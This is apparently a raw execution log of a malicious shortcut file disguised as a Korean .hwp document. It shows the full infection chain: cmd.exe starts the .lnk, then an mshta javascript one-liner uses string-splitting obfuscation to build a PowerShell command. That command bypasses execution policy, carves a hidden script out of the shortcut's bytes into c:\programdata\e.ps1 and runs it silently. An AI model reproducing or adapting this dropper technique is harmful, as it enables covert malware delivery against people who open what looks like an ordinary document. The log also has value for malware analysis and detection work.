cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GQRGkj" C:\Users\test22\AppData\Local\Temp\20250402_62842.hwp.lnk
2544mshta.exe "C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);
2656powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
2784powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
2892